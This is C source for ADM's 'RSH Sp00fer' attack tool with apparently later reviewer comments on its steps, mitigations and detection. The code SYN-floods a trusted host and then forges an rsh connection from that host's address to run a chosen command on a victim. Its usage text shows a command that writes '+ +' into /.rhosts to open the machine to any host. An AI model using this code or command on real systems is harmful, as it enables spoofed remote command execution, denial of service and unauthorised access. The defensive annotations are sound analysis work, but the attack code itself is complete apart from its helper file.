/************************************************************************/
/* ADM RSH Sp00fer ver 0.5 (c) ADM */
/* */
/* The ADM CreW */
/* official ftp site: ftp.janova.org/pub/adm */
/* all credit going to: Heike my eternal lov =) , ADM Crew, !w00w00 */
/************************************************************************/

/*
 * Reviewer notes (defensive reading of this listing).
 *
 * What the visible code does, in order: resolve three hosts, probe the
 * "trusted" host for an open port, call ADMsyn() against that port, build an
 * rsh-style request in cmd[], call Sconnect() towards port 514 on the
 * destination with the trusted host's address as the source argument, send
 * the request with Swrite(), then call Srst().
 *
 * pprobe, ADMsyn, Sconnect, Swrite, Srst, myip and TH_SYN are not defined in
 * this file; they presumably come from ADM-spoof.c, which is not shown, so
 * how the connection is actually established cannot be verified from here.
 *
 * What the technique depends on, going by the program's own usage text:
 * a remote-shell service that authorises a peer by source IP address alone
 * (the usage example targets /.rhosts).
 *
 * Mitigations a defender would check:
 *   - r-services (rsh/rlogin/rexec) retired in favour of SSH, with no
 *     address-based trust left in .rhosts or hosts.equiv;
 *   - TCP initial sequence numbers randomised per RFC 6528;
 *   - anti-spoofing filters at network edges (BCP 38 / uRPF), so packets
 *     claiming an internal source address are dropped on external interfaces;
 *   - SYN-flood protection (e.g. SYN cookies) on hosts that others trust.
 *
 * Detection ideas: a short SYN burst to one service port on a trusted host
 * followed by a 514/tcp session on a host that trusts it; unexpected changes
 * to .rhosts or hosts.equiv.
 */

/* NOTE(review): includes a .c file directly; all helpers used below live there. */
#include "ADM-spoof.c"

/* Third argument passed to ADMsyn() in main(); presumably a packet count. */
#define NUMBASYN 20
/* Shared failure value; also compared against socket() results below. */
#define ERROR -1
#define VERSION "0.5 pub"

/*
 * Rcheckport - return the first port from a fixed list for which
 * pprobe(d_ip, port, TH_SYN) returns 0, or ERROR when none does.
 *
 * The list begins with the BSD r-service ports (512 exec, 513 login,
 * 514 shell). main() passes the trusted host's address here, not the
 * destination's, despite the parameter name.
 * pprobe() is not visible; the "0 means open" reading is inferred from the
 * caller's messages - confirm against ADM-spoof.c.
 */
int Rcheckport(u_int d_ip)
{
  int i;
  int port[18]={512,513,514,515,520,526,530,531,532,540,543,544,556,600,749,750,751,754};

  for(i=0;i<18;i++){
    if( pprobe(d_ip,port[i],TH_SYN) == 0 ) return(port[i]);
  }
  return(ERROR);
}

/*
 * host2ip - resolve a host name (or dotted address) with gethostbyname()
 * and return the first address as stored in sin_addr.s_addr.
 *
 * Returns 0 when resolution fails; no caller in this file checks for that,
 * so a failed lookup is silently used as address 0.
 * NOTE(review): h_length bytes are copied into sin_addr without checking
 * that the result is an IPv4 (4-byte) address.
 */
unsigned long host2ip(char *serv)
{
  struct sockaddr_in sinn;
  struct hostent *hent;

  hent=gethostbyname(serv);
  if(hent == NULL) return 0;
  bzero((char *)&sinn, sizeof(sinn));
  bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
  return sinn.sin_addr.s_addr;
}

/*
 * main - command-line driver.
 *
 * Arguments, per the usage text below: argv[1] trusted host, argv[2]
 * destination, argv[3] local address, argv[4] local user, argv[5] remote
 * user, argv[6] command.
 *
 * NOTE(review): declared as `void main`, which is non-standard, and the
 * failure paths call exit(0), so the exit status does not reflect errors.
 */
void main(int argc, char **argv)
{
  unsigned long s_ip;
  unsigned long d_ip;
  unsigned long da_ip;
  int s, s_r;
  int i=1;            /* used only as the "on" value for IP_HDRINCL */
  char *cmdptr;
  u_int sport;
  unsigned int DAPORT=514;   /* 514/tcp is the rsh "shell" service */
  char cmd[512];

  /*
   * NOTE(review): only argc<2 is rejected, but argv[2]..argv[6] are read
   * unconditionally further down, so fewer than six arguments leads to
   * NULL or out-of-range argv reads.
   */
  if(argc<2){
    system("clear");
    printf("\n\n\n\n\n\n\n\n\n\t\t\t =============================\n");
    printf("\t\t\t = $$$ $$$$$$ $$ $$ =\n");
    printf("\t\t\t == $$ $$ $$ $$ $$$ $$$ ==\n");
    printf("\t\t\t=== $$$$$$$ $$ $$ $$ $ $$ ===\n");
    printf("\t\t\t == $$ $$ $$ $$ $$ $$ ==\n");
    printf("\t\t\t = $$ $$ $$$$$$ $$ $$ =\n");
    printf("\t\t\t =============================\n");
    printf("\t\t\t RoX The NeTw0rk\n");
    sleep(1);
    system("clear");
    printf(" ADMrsh\n");
    printf(" **==**\n\n");
    printf(" It's very easy to use (like all the ADM products).\n\n");
    printf(" ADMrsh [ips] [ipd] [ipl] [luser] [ruser] [cmd] \n\n");
    printf(" Parameters List : \n");
    printf(" ips = ip source (ip of the trusted host)\n");
    printf(" ipd = ip destination (ip of the victim)\n");
    printf(" ipl = ip local (your ip to receive the informations)\n");
    printf(" luser = local user\n");
    printf(" ruser = remote user\n");
    printf(" cmd = command to execute\n\n");
    printf(" If ya don't understand, this is an example :\n\n");
    printf(" ADMrsh a.foo.us b.foo.us ppp.bad.org root root \"echo\\\"+ +\\\">/.rhosts\"\n\n");
    printf(" Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet \n");
    printf(" ADMrsh %s (c) ADM <-- hehe ;) \n",VERSION);
    exit(0);
  }

  /* Zero the whole buffer; the packet builder below relies on this for its NUL separators. */
  memset(cmd,0,512);

  /* Raw TCP socket. s_r is never referenced again in this function. */
  if( (s_r=socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == ERROR){
    perror("socket");
    exit(ERROR);
  }

  /*
   * Raw IP socket used for everything that follows. Raw sockets normally
   * require elevated privileges.
   * NOTE(review): on failure this only prints the error and carries on with
   * s == -1.
   */
  if( (s=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR){
    perror("socket");
  }

  /* IP_HDRINCL: the caller supplies the IP header itself, source address included. */
#ifdef IP_HDRINCL
  if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) < 0) {
    fprintf(stderr, "cant set IP_HDRINCL\n");
    close(s);
    exit(0);
  }
#endif

  printf("open socket...\n");

  /* None of these lookups is checked for the 0 failure value of host2ip(). */
  d_ip = host2ip(argv[2]);
  s_ip = host2ip(argv[1]);
  /* myip is not declared in this file; presumably a global from ADM-spoof.c. */
  myip.ip = da_ip = host2ip(argv[3]);

  printf("make port prob of the trusted host...\n");
  sport=Rcheckport(s_ip);

  /*
   * sport is unsigned, so ERROR (-1) is converted to UINT_MAX for this
   * comparison; it still matches because Rcheckport's -1 was converted the
   * same way on assignment. The fallback is the fixed value 513, not a
   * random port as the message says.
   * NOTE(review): %i is used with an unsigned argument.
   */
  if(sport == ERROR){
    printf("argh no port open ... he seem to be hard... :/ take a random sport\n");
    sport = 513;
  }
  else{
    printf("ok we have found a the port %i open \n",sport);
  }

  /*
   * ADMsyn() is not visible here; going by the messages it sends a burst of
   * SYNs to the trusted host's port, presumably so that host cannot answer
   * traffic arriving for the forged connection - confirm in ADM-spoof.c.
   */
  printf("let's play synfl00d\n");
  ADMsyn(s_ip ,sport,NUMBASYN);
  printf("synflood finish..\n");

  /*
   * Build the request as four NUL-terminated fields packed back to back:
   *   "0" \0  argv[4] \0  argv[5] \0  argv[6] \0
   * This matches the rsh request layout (stderr port, local user, remote
   * user, command). The literal "0\0" contributes only "0" to strcat; the
   * separators come from the earlier memset.
   * NOTE(review): strcat is unbounded and cmd is 512 bytes, so long
   * arguments overflow the stack buffer.
   */
  printf("make packet...\n");
  cmdptr=cmd;
  strcat(cmdptr,"0\0");
  cmdptr=cmdptr+2;
  strcat(cmdptr,argv[4]);
  cmdptr=cmdptr+strlen(argv[4])+1;
  strcat(cmdptr,argv[5]);
  cmdptr=cmdptr+strlen(argv[5])+1;
  strcat(cmdptr,argv[6]);
  cmdptr=cmdptr+strlen(argv[6])+1;

  printf("GO!\n");

  /*
   * Sconnect() is not visible here. It receives the trusted host's address
   * and probed port as the source side, the destination and port 514 as the
   * peer, and the local address last.
   */
  if( Sconnect(s,s_ip,d_ip,sport,DAPORT,da_ip) == ERROR ) {
    printf("your connexion iz too slow !\n");
    printf("try again ...\n");
    printf("Tested on: SunOs 4.1.* ,FreeBSD,HP-UX\n,DEC");
    printf("have fun ;)\n");
    exit(0);
  }

  /* Length = three argument strings + 2 bytes for "0\0" + 3 NUL terminators. */
  Swrite(s,cmd,strlen(argv[4])+strlen(argv[5])+strlen(argv[6])+2+3);
  printf("spoof sent..\n");

  /* Srst() is not visible; by name and message it resets the forged connection. */
  Srst(s);
  printf("reset connection...\n");
}